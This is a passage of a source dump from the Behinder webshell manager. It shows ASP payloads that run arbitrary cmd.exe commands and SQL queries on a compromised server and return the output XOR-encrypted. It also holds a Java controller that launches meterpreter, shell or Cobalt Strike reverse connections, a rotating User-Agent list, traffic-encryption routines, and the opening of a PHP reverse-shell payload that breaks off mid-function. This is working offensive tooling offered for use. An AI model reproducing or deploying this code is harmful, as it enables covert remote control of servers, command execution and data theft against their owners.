错误源:"&Err.Source&"
"
48 | End If
49 | End Function
50 | Function GetStream()
51 | Set GetStream=CreateObject("Adodb.Stream")
52 | End Function
53 | Function GetFso()
54 | Dim Fso,Key
55 | Key="Scripting.FileSystemObject"
56 | Set Fso=server.CreateObject(Key)
57 | Set GetFso=Fso
58 | End Function
59 | Function FileRead(FilePath,A)
60 | on error resume next
61 | If FilePath<>"" then
62 | Dim Stream,filecontent,Fso
63 | If A="Stream" then
64 | Set Stream=GetStream()
65 | with Stream
66 | .type=2
67 | .mode=3
68 | .open
69 | .charset="gbk"
70 | .LoadFromFile FilePath
71 | filecontent=.ReadText()
72 | .close
73 | End With
74 |
75 | Set Stream=Nothing
76 | Else
77 | Set Fso=GetFso()
78 | filecontent=Fso.OpenTextFile(FilePath).ReadAll
79 | If Err Then
80 | status="fail"
81 | message=GetErr(err)
82 | End If
83 | Set Fso=Nothing
84 | End If
85 | FileRead=filecontent
86 | End If
87 | End Function
88 |
89 | Sub runCmd(cmd)
90 | on error resume Next
91 | Dim ws,sa
92 | Set ws=server.createobject("WScript.shell")
93 | If IsEmpty(ws) Then
94 | Set ws=server.createobject("WScript.shell.1")
95 | End If
96 | If IsEmpty(ws) Then
97 | Set sa=server.createobject("shell.application")
98 | End If
99 | If IsEmpty(ws) And IsEmpty(sa) Then
100 | Set sa=server.createobject("shell.application.1")
101 | End If
102 |
103 |
104 | If Not IsEmpty(ws) Then
105 | Set process=ws.exec("cmd.exe /c "&cmd)
106 | cmdResult=process.stdout.readall
107 | cmdResult=cmdResult&process.stderr.readall
108 | 'cmdResult=Replace(cmdResult,vbCrLf,"")
109 | message=cmdResult
110 | End If
111 |
112 | If Not IsEmpty(sa) Then
113 | sa.ShellExecute "cmd.exe","/c "&cmd,"","open",0
114 | End If
115 | finalResult="{""status"":"""&Base64Encode("success")&""",""msg"":"""&Base64Encode(message)&"""}"
116 | Response.binarywrite(Encrypt(finalResult))
117 | End Sub
118 |
119 | Sub main(arrArgs)
120 | cmd=arrArgs(0)
121 | runCmd(cmd)
122 | End Sub
123 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/payload/asp/Database.asp:
--------------------------------------------------------------------------------
1 | Function Base64Encode(sText)
2 | Dim oXML, oNode
3 |
4 | Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
5 | Set oNode = oXML.CreateElement("base64")
6 | oNode.dataType = "bin.base64"
7 | oNode.nodeTypedValue =Stream_StringToBinary(sText)
8 | If Mid(oNode.text,1,4)="77u/" Then
9 | oNode.text=Mid(oNode.text,5)
10 | End If
11 | Base64Encode = Replace(oNode.text, vbLf, "")
12 | Set oNode = Nothing
13 | Set oXML = Nothing
14 | End Function
15 |
16 | Function Stream_StringToBinary(Text)
17 | Const adTypeText = 2
18 | Const adTypeBinary = 1
19 | Dim BinaryStream 'As New Stream
20 | Set BinaryStream = CreateObject("ADODB.Stream")
21 | BinaryStream.Type = adTypeText
22 | BinaryStream.CharSet = "utf-8"
23 | BinaryStream.Open
24 | BinaryStream.WriteText Text
25 | BinaryStream.Position = 0
26 | BinaryStream.Type = adTypeBinary
27 | BinaryStream.Position = 0
28 | Stream_StringToBinary = BinaryStream.Read
29 | Set BinaryStream = Nothing
30 | End Function
31 |
32 | Function Encrypt(data)
33 | key=Session("k")
34 | size=len(data)
35 | For i=1 To size
36 | encryptResult=encryptResult&chrb(asc(mid(data,i,1)) Xor Asc(Mid(key,(i and 15)+1,1)))
37 | Next
38 | Encrypt=encryptResult
39 | End Function
40 |
41 | Sub SendErr(Err)'检查错误处理
42 | If Err Then
43 | message= Err.Description&"Error Source:"&Err.Source
44 | finalResult="{""status"":"""&Base64Encode("fail")&""",""msg"":"""&Base64Encode(message)&"""}"
45 | Response.binarywrite(Encrypt(finalResult))
46 | 'Response.write(finalResult)
47 | Response.End
48 | End If
49 | End Sub
50 |
51 |
52 |
53 | Sub main(arrArgs)
54 | on error resume next
55 | dbType=arrArgs(0)
56 | host=arrArgs(1)
57 | port=arrArgs(2)
58 | username=arrArgs(3)
59 | pass=arrArgs(4)
60 | database=arrArgs(5)
61 | sql=arrArgs(6)
62 |
63 | Dim conn
64 | Set conn = Server.CreateObject("ADODB.Connection")
65 | Dim ds
66 | ds = host & "," & port
67 | Dim connString
68 | If IsEmpty(database) or database="" Then
69 | connString = "Provider=SQLOLEDB;Data Source=" & ds & ";Network Library=DBMSSOCN;User Id=" & username & ";Password=" & pass & ";"
70 | Else
71 | connString = "Provider=SQLOLEDB;Data Source=" & ds & ";Network Library=DBMSSOCN;Initial Catalog=" & database & ";User Id=" & username & ";Password=" & pass & ";"
72 | End If
73 | conn.Open connString
74 |
75 | If conn.Errors.Count > 0 Then
76 | SendErr Err
77 | End If
78 |
79 | Set rs = conn.Execute(sql)
80 | If conn.Errors.Count > 0 Then
81 | SendErr Err
82 | Else
83 | Dim fieldArr,filedNum
84 | filedNum=rs.Fields.count
85 | ReDim fieldArr(filedNum-1)
86 | For i=0 To filedNum-1
87 | fieldArr(i)=rs.Fields(i).Name
88 | Next
89 | finalResult="["
90 | finalResult=finalResult&"["
91 | For Each objField in rs.Fields
92 | finalResult=finalResult&"{""name"":"""&objField.Name&"""},"
93 | Next
94 | finalResult=finalResult&"]"
95 |
96 | While Not rs.EOF
97 | rowStr=",["
98 |
99 | For Each objField in rs.Fields
100 | rowStr=rowStr&""""&rs(objField.Name)&""","
101 | 'Response.Write "" & rs(objField.Name) & " | "
102 | Next
103 | rowStr=rowStr&"]"
104 | finalResult=finalResult&rowStr
105 | rs.MoveNext
106 | Wend
107 | finalResult=finalResult&"]"
108 | rs.Close
109 | End If
110 | conn.Close
111 | Set conn = Nothing
112 | finalResult="{""status"":"""&Base64Encode("success")&""",""msg"":"""&Base64Encode(finalResult)&"""}"
113 | Response.binarywrite(Encrypt(finalResult))
114 | End Sub
115 |
116 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/utils/jc/Run.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.utils.jc;
2 |
3 | import javax.tools.*;
4 | import javax.tools.JavaCompiler.CompilationTask;
5 | import java.io.File;
6 | import java.util.ArrayList;
7 | import java.util.Arrays;
8 | import java.util.Iterator;
9 | import java.util.List;
10 | import java.util.regex.Matcher;
11 | import java.util.regex.Pattern;
12 |
13 | public class Run {
14 | public Run() {
15 | }
16 |
17 | public static void main(String[] args) {
18 | (new Run()).test();
19 | }
20 |
21 | public void test() {
22 | String var1 = "\r\nimport javax.servlet.jsp.PageContext;\r\nimport javax.servlet.ServletOutputStream;\r\npublic class test\r\n{\r\n\tpublic boolean equals(Object obj){\r\n\r\n\tPageContext page = (PageContext) obj;\r\n\t\t\ttry {\r\n\t\t\t\tServletOutputStream so=page.getResponse().getOutputStream();\r\n\t\t\t\tso.write(\"afsddf\".getBytes(\"UTF-8\"));\r\n\t\t\t\tso.flush();\r\n\t\t\t\tso.close();\r\n\t\t\t\tpage.getOut().clear(); \r\n\t\t\t} catch (Exception e) {\r\n\t\t\t\t// TODO Auto-generated catch block\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t} \r\n\t\treturn true;\r\n}\r\n}";
23 |
24 | try {
25 | while (true) {
26 | Thread.sleep(2000L);
27 | }
28 | } catch (Exception var3) {
29 | var3.printStackTrace();
30 | }
31 | }
32 |
33 | public static byte[] getClassFromSourceCode(String sourceCode) throws Exception {
34 | byte[] classBytes = null;
35 | Pattern CLASS_PATTERN = Pattern.compile("class\\s+([$_a-zA-Z][$_a-zA-Z0-9]*)\\s*");
36 | Matcher matcher = CLASS_PATTERN.matcher(sourceCode);
37 | if (matcher.find()) {
38 | String cls = matcher.group(1);
39 | JavaCompiler jc = ToolProvider.getSystemJavaCompiler();
40 | if (jc == null) {
41 | throw new Exception("本地机器上没有找到编译环境,请确认:1.是否安装了JDK环境;2." + System.getProperty("java.home") + File.separator + "lib目录下是否有tools.jar.");
42 | } else {
43 | StandardJavaFileManager standardJavaFileManager = jc.getStandardFileManager(null, null, null);
44 | JavaFileManager fileManager = new CustomClassloaderJavaFileManager(Run.class.getClassLoader(), standardJavaFileManager);
45 | JavaFileObject javaFileObject = new MyJavaFileObject(cls, sourceCode);
46 | List options = new ArrayList();
47 | options.add("-source");
48 | options.add("1.6");
49 | options.add("-target");
50 | options.add("1.6");
51 | DiagnosticCollector collector = new DiagnosticCollector();
52 | CompilationTask cTask = jc.getTask(null, fileManager, collector, options, null, Arrays.asList(javaFileObject));
53 | boolean result = cTask.call();
54 | if (!result) {
55 | List diagnostics = collector.getDiagnostics();
56 | Iterator var14 = diagnostics.iterator();
57 | if (var14.hasNext()) {
58 | Diagnostic diagnostic = (Diagnostic) var14.next();
59 | throw new Exception(diagnostic.getMessage(null));
60 | }
61 | }
62 |
63 | JavaFileObject fileObject = (JavaFileObject) CustomClassloaderJavaFileManager.fileObjects.get(cls);
64 | if (fileObject != null) {
65 | classBytes = ((MyJavaFileObject) fileObject).getCompiledBytes();
66 | }
67 |
68 | return classBytes;
69 | }
70 | } else {
71 | throw new IllegalArgumentException("No such class name in " + sourceCode);
72 | }
73 | }
74 | }
75 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/controller/ReverseViewController.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.ui.controller;
2 |
3 | import javafx.application.Platform;
4 | import javafx.fxml.FXML;
5 | import javafx.scene.control.*;
6 | import net.rebeyond.behinder.core.ShellService;
7 | import net.rebeyond.behinder.dao.ShellManager;
8 | import org.json.JSONObject;
9 |
10 | import java.util.List;
11 |
12 | public class ReverseViewController {
13 | private ShellManager shellManager;
14 | @FXML
15 | private TextField reverseIPText;
16 | @FXML
17 | private TextField reversePortText;
18 | @FXML
19 | private RadioButton reverseTypeMeterRadio;
20 | @FXML
21 | private RadioButton reverseTypeShellRadio;
22 | @FXML
23 | private RadioButton reverseTypeColbatRadio;
24 | @FXML
25 | private Button reverseButton;
26 | @FXML
27 | private TextArea reverseHelpTextArea;
28 | private ShellService currentShellService;
29 | private JSONObject shellEntity;
30 | private List workList;
31 | private Label statusLabel;
32 |
33 | public ReverseViewController() {
34 | }
35 |
36 | public void init(ShellService shellService, List workList, Label statusLabel) {
37 | this.currentShellService = shellService;
38 | this.shellEntity = shellService.getShellEntity();
39 | this.workList = workList;
40 | this.statusLabel = statusLabel;
41 | this.initReverseView();
42 | }
43 |
44 | private void initReverseView() {
45 | ToggleGroup radioGroup = new ToggleGroup();
46 | this.reverseTypeMeterRadio.setToggleGroup(radioGroup);
47 | this.reverseTypeShellRadio.setToggleGroup(radioGroup);
48 | this.reverseTypeColbatRadio.setToggleGroup(radioGroup);
49 | this.reverseTypeMeterRadio.setUserData("meter");
50 | this.reverseTypeShellRadio.setUserData("shell");
51 | this.reverseTypeColbatRadio.setUserData("colbat");
52 | this.reverseButton.setOnAction((event) -> {
53 | Runnable runner = () -> {
54 | try {
55 | String targetIP = this.reverseIPText.getText();
56 | String targetPort = this.reversePortText.getText();
57 | RadioButton currentTypeRadio = (RadioButton) radioGroup.getSelectedToggle();
58 | if (currentTypeRadio == null) {
59 | Platform.runLater(() -> {
60 | this.statusLabel.setText("请先选择反弹类型。");
61 | });
62 | return;
63 | }
64 |
65 | String type = currentTypeRadio.getUserData().toString();
66 | JSONObject resultObj = this.currentShellService.connectBack(type, targetIP, targetPort);
67 | String status = resultObj.getString("status");
68 | if (status.equals("fail")) {
69 | Platform.runLater(() -> {
70 | String msg = resultObj.getString("msg");
71 | this.statusLabel.setText("反弹失败:" + msg);
72 | });
73 | } else {
74 | Platform.runLater(() -> {
75 | this.statusLabel.setText("反弹成功。");
76 | });
77 | }
78 | } catch (Exception var8) {
79 | var8.printStackTrace();
80 | Platform.runLater(() -> {
81 | this.statusLabel.setText("操作失败:" + var8.getMessage());
82 | });
83 | }
84 |
85 | };
86 | Thread worker = new Thread(runner);
87 | this.workList.add(worker);
88 | worker.start();
89 | });
90 | }
91 | }
92 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/core/Constants.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.core;
2 |
3 | public class Constants {
4 | public static String[] userAgents = new String[]{"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPod; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"};
5 | public static String VERSION = "v3.0 Beta 4 ";
6 | public static int MENU_CUT = 1;
7 | public static int MENU_COPY = 16;
8 | public static int MENU_PASTE = 256;
9 | public static int MENU_CLEAR = 4096;
10 | public static int MENU_SELECT_ALL = 65536;
11 | public static int MENU_ALL = 69905;
12 | public static int ENCRYPT_TYPE_AES = 0;
13 | public static int ENCRYPT_TYPE_XOR = 1;
14 | public static int REALCMD_RUNNING = 0;
15 | public static int REALCMD_STOPPED = 1;
16 | public static int PROXY_ENABLE = 0;
17 | public static int PROXY_DISABLE = 1;
18 | public static int COLUMN_DATA_TYPE_INT = 0;
19 | public static int COLUMN_DATA_TYPE_STRING = 1;
20 | public static int FILE_TYPE_DIRECTORY = 0;
21 | public static int FILE_TYPE_FILE = 1;
22 | public static int SCRIPT_TYPE_ASP = 0;
23 | public static int SCRIPT_TYPE_ASPX = 1;
24 | public static int SCRIPT_TYPE_PHP = 2;
25 | public static int SCRIPT_TYPE_JAVA = 3;
26 | public static int PLUGIN_TYPE_SCAN = 0;
27 | public static int PLUGIN_TYPE_EXPLOIT = 1;
28 | public static int PLUGIN_TYPE_TOOL = 2;
29 | public static int PLUGIN_TYPE_OTHER = 3;
30 | public static String[] cookieProperty = new String[]{"expires", "max-age", "domain", "path", "secure", "httponly", "samesite"};
31 |
32 | public Constants() {
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | # Created by https://www.toptal.com/developers/gitignore/api/java,jetbrains,gradle
3 | # Edit at https://www.toptal.com/developers/gitignore?templates=java,jetbrains,gradle
4 |
5 | ### Java ###
6 | # Compiled class file
7 | # *.class
8 |
9 | # Log file
10 | *.log
11 |
12 | # BlueJ files
13 | *.ctxt
14 |
15 | # Mobile Tools for Java (J2ME)
16 | .mtj.tmp/
17 |
18 | # Package Files #
19 | *.jar
20 | *.war
21 | *.nar
22 | *.ear
23 | *.zip
24 | *.tar.gz
25 | *.rar
26 |
27 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
28 | hs_err_pid*
29 |
30 | ### JetBrains ###
31 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider
32 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
33 |
34 | # User-specific stuff
35 | .idea/**/workspace.xml
36 | .idea/**/tasks.xml
37 | .idea/**/usage.statistics.xml
38 | .idea/**/dictionaries
39 | .idea/**/shelf
40 |
41 | # Generated files
42 | .idea/**/contentModel.xml
43 |
44 | # Sensitive or high-churn files
45 | .idea/**/dataSources/
46 | .idea/**/dataSources.ids
47 | .idea/**/dataSources.local.xml
48 | .idea/**/sqlDataSources.xml
49 | .idea/**/dynamic.xml
50 | .idea/**/uiDesigner.xml
51 | .idea/**/dbnavigator.xml
52 |
53 | # Gradle
54 | .idea/**/gradle.xml
55 | .idea/**/libraries
56 |
57 | # Gradle and Maven with auto-import
58 | # When using Gradle or Maven with auto-import, you should exclude module files,
59 | # since they will be recreated, and may cause churn. Uncomment if using
60 | # auto-import.
61 | # .idea/artifacts
62 | # .idea/compiler.xml
63 | # .idea/jarRepositories.xml
64 | # .idea/modules.xml
65 | # .idea/*.iml
66 | # .idea/modules
67 | # *.iml
68 | # *.ipr
69 |
70 | # CMake
71 | cmake-build-*/
72 |
73 | # Mongo Explorer plugin
74 | .idea/**/mongoSettings.xml
75 |
76 | # File-based project format
77 | *.iws
78 |
79 | # IntelliJ
80 | out/
81 |
82 | # mpeltonen/sbt-idea plugin
83 | .idea_modules/
84 |
85 | # JIRA plugin
86 | atlassian-ide-plugin.xml
87 |
88 | # Cursive Clojure plugin
89 | .idea/replstate.xml
90 |
91 | # Crashlytics plugin (for Android Studio and IntelliJ)
92 | com_crashlytics_export_strings.xml
93 | crashlytics.properties
94 | crashlytics-build.properties
95 | fabric.properties
96 |
97 | # Editor-based Rest Client
98 | .idea/httpRequests
99 |
100 | # Android studio 3.1+ serialized cache file
101 | .idea/caches/build_file_checksums.ser
102 |
103 | ### JetBrains Patch ###
104 | # Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721
105 |
106 | # *.iml
107 | # modules.xml
108 | # .idea/misc.xml
109 | # *.ipr
110 |
111 | # Sonarlint plugin
112 | # https://plugins.jetbrains.com/plugin/7973-sonarlint
113 | .idea/**/sonarlint/
114 |
115 | # SonarQube Plugin
116 | # https://plugins.jetbrains.com/plugin/7238-sonarqube-community-plugin
117 | .idea/**/sonarIssues.xml
118 |
119 | # Markdown Navigator plugin
120 | # https://plugins.jetbrains.com/plugin/7896-markdown-navigator-enhanced
121 | .idea/**/markdown-navigator.xml
122 | .idea/**/markdown-navigator-enh.xml
123 | .idea/**/markdown-navigator/
124 |
125 | # Cache file creation bug
126 | # See https://youtrack.jetbrains.com/issue/JBR-2257
127 | .idea/$CACHE_FILE$
128 |
129 | # CodeStream plugin
130 | # https://plugins.jetbrains.com/plugin/12206-codestream
131 | .idea/codestream.xml
132 |
133 | ### Gradle ###
134 | .gradle
135 | build/
136 |
137 | # Ignore Gradle GUI config
138 | gradle-app.setting
139 |
140 | # Avoid ignoring Gradle wrapper jar file (.jar files are usually ignored)
141 | !gradle-wrapper.jar
142 |
143 | # Cache of project
144 | .gradletasknamecache
145 |
146 | # # Work around https://youtrack.jetbrains.com/issue/IDEA-116898
147 | # gradle/wrapper/gradle-wrapper.properties
148 |
149 | ### Gradle Patch ###
150 | **/build/
151 |
152 | # End of https://www.toptal.com/developers/gitignore/api/java,jetbrains,gradle
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/utils/jc/CustomClassloaderJavaFileManager.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.utils.jc;
2 |
3 | import javax.tools.*;
4 | import javax.tools.JavaFileObject.Kind;
5 | import java.io.IOException;
6 | import java.util.Collections;
7 | import java.util.Iterator;
8 | import java.util.Map;
9 | import java.util.Set;
10 | import java.util.concurrent.ConcurrentHashMap;
11 |
12 | public class CustomClassloaderJavaFileManager implements JavaFileManager {
13 | private final ClassLoader classLoader;
14 | private final StandardJavaFileManager standardFileManager;
15 | private final PackageInternalsFinder finder;
16 | public static Map fileObjects = new ConcurrentHashMap();
17 |
18 | public CustomClassloaderJavaFileManager(ClassLoader classLoader, StandardJavaFileManager standardFileManager) {
19 | this.classLoader = classLoader;
20 | this.standardFileManager = standardFileManager;
21 | this.finder = new PackageInternalsFinder(classLoader);
22 | }
23 |
24 | public ClassLoader getClassLoader(Location location) {
25 | return this.standardFileManager.getClassLoader(location);
26 | }
27 |
28 | public String inferBinaryName(Location location, JavaFileObject file) {
29 | return file instanceof CustomJavaFileObject ? ((CustomJavaFileObject) file).binaryName() : this.standardFileManager.inferBinaryName(location, file);
30 | }
31 |
32 | public boolean isSameFile(FileObject a, FileObject b) {
33 | return this.standardFileManager.isSameFile(a, b);
34 | }
35 |
36 | public boolean handleOption(String current, Iterator remaining) {
37 | return this.standardFileManager.handleOption(current, remaining);
38 | }
39 |
40 | public boolean hasLocation(Location location) {
41 | return location == StandardLocation.CLASS_PATH || location == StandardLocation.PLATFORM_CLASS_PATH;
42 | }
43 |
44 | public JavaFileObject getJavaFileForInput(Location location, String className, Kind kind) throws IOException {
45 | JavaFileObject javaFileObject = (JavaFileObject) fileObjects.get(className);
46 | if (javaFileObject == null) {
47 | this.standardFileManager.getJavaFileForInput(location, className, kind);
48 | }
49 |
50 | return javaFileObject;
51 | }
52 |
53 | public JavaFileObject getJavaFileForOutput(Location location, String className, Kind kind, FileObject sibling) throws IOException {
54 | JavaFileObject javaFileObject = new MyJavaFileObject(className, kind);
55 | fileObjects.put(className, javaFileObject);
56 | return javaFileObject;
57 | }
58 |
59 | public FileObject getFileForInput(Location location, String packageName, String relativeName) throws IOException {
60 | return this.standardFileManager.getFileForInput(location, packageName, relativeName);
61 | }
62 |
63 | public FileObject getFileForOutput(Location location, String packageName, String relativeName, FileObject sibling) throws IOException {
64 | return this.standardFileManager.getFileForOutput(location, packageName, relativeName, sibling);
65 | }
66 |
67 | public void flush() throws IOException {
68 | this.standardFileManager.flush();
69 | }
70 |
71 | public void close() throws IOException {
72 | this.standardFileManager.close();
73 | }
74 |
75 | public Iterable list(Location location, String packageName, Set kinds, boolean recurse) throws IOException {
76 | if (location == StandardLocation.PLATFORM_CLASS_PATH) {
77 | return this.standardFileManager.list(location, packageName, kinds, recurse);
78 | } else if (location == StandardLocation.CLASS_PATH && kinds.contains(Kind.CLASS)) {
79 | return packageName.startsWith("java.") ? this.standardFileManager.list(location, packageName, kinds, recurse) : this.finder.find(packageName);
80 | } else {
81 | return Collections.emptyList();
82 | }
83 | }
84 |
85 | public int isSupportedOption(String option) {
86 | return -1;
87 | }
88 | }
89 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/core/Crypt.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.core;
2 |
3 | import net.rebeyond.behinder.utils.Base64;
4 |
5 | import javax.crypto.Cipher;
6 | import javax.crypto.spec.IvParameterSpec;
7 | import javax.crypto.spec.SecretKeySpec;
8 | import java.nio.charset.StandardCharsets;
9 |
10 | public class Crypt {
11 | public Crypt() {
12 | }
13 |
14 | public static byte[] Encrypt(byte[] bs, String key) throws Exception {
15 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
16 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
17 | Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
18 | cipher.init(1, skeySpec);
19 | return cipher.doFinal(bs);
20 | }
21 |
22 | public static byte[] Decrypt(byte[] bs, String key, int encryptType, String type) throws Exception {
23 | byte[] result = null;
24 | switch (type) {
25 | case "jsp":
26 | result = DecryptForJava(bs, key);
27 | break;
28 | case "php":
29 | result = DecryptForPhp(bs, key, encryptType);
30 | break;
31 | case "aspx":
32 | result = DecryptForCSharp(bs, key);
33 | break;
34 | case "asp":
35 | result = DecryptForAsp(bs, key);
36 | break;
37 | }
38 |
39 | return result;
40 | }
41 |
42 | public static byte[] DecryptForJava(byte[] bs, String key) throws Exception {
43 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
44 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
45 | Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
46 | cipher.init(2, skeySpec);
47 | return cipher.doFinal(bs);
48 | }
49 |
50 | public static byte[] EncryptForCSharp(byte[] bs, String key) throws Exception {
51 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
52 | IvParameterSpec iv = new IvParameterSpec(raw);
53 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
54 | Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
55 | cipher.init(1, skeySpec, iv);
56 | return cipher.doFinal(bs);
57 | }
58 |
59 | public static byte[] DecryptForCSharp(byte[] bs, String key) throws Exception {
60 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
61 | IvParameterSpec iv = new IvParameterSpec(raw);
62 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
63 | Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
64 | cipher.init(2, skeySpec, iv);
65 | return cipher.doFinal(bs);
66 | }
67 |
68 | public static byte[] EncryptForPhp(byte[] bs, String key, int encryptType) throws Exception {
69 | byte[] encrypted = null;
70 | if (encryptType == Constants.ENCRYPT_TYPE_AES) {
71 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
72 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
73 | Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
74 | cipher.init(1, skeySpec, new IvParameterSpec(new byte[]{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}));
75 | encrypted = cipher.doFinal(bs);
76 | } else if (encryptType == Constants.ENCRYPT_TYPE_XOR) {
77 | encrypted = DecryptForAsp(bs, key);
78 | }
79 |
80 | return encrypted;
81 | }
82 |
83 | public static byte[] EncryptForAsp(byte[] bs, String key) {
84 | for (int i = 0; i < bs.length; ++i) {
85 | bs[i] ^= key.getBytes()[i + 1 & 15];
86 | }
87 |
88 | return bs;
89 | }
90 |
91 | public static byte[] DecryptForPhp(byte[] bs, String key, int encryptType) throws Exception {
92 | byte[] decrypted = null;
93 | if (encryptType == Constants.ENCRYPT_TYPE_AES) {
94 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
95 | bs = Base64.decode(new String(bs));
96 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
97 | Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
98 | cipher.init(2, skeySpec, new IvParameterSpec(new byte[]{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}));
99 | decrypted = cipher.doFinal(bs);
100 | } else if (encryptType == Constants.ENCRYPT_TYPE_XOR) {
101 | decrypted = DecryptForAsp(bs, key);
102 | }
103 |
104 | return decrypted;
105 | }
106 |
107 | public static byte[] DecryptForAsp(byte[] bs, String key) {
108 | for (int i = 0; i < bs.length; ++i) {
109 | bs[i] ^= key.getBytes()[i + 1 & 15];
110 | }
111 | return bs;
112 | }
113 | }
114 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/payload/php/ConnectBack.php:
--------------------------------------------------------------------------------
1 | @error_reporting(0);
2 | @set_time_limit(0);
3 | function main($type,$ip,$port)
4 | {
5 | if ($type=="shell")
6 | {
7 | common($ip,$port);
8 | }
9 | else if ($type="meter")
10 | {
11 | meter($ip,$port);
12 | }
13 |
14 | }
15 |
16 | function meter($ip,$port)
17 | {
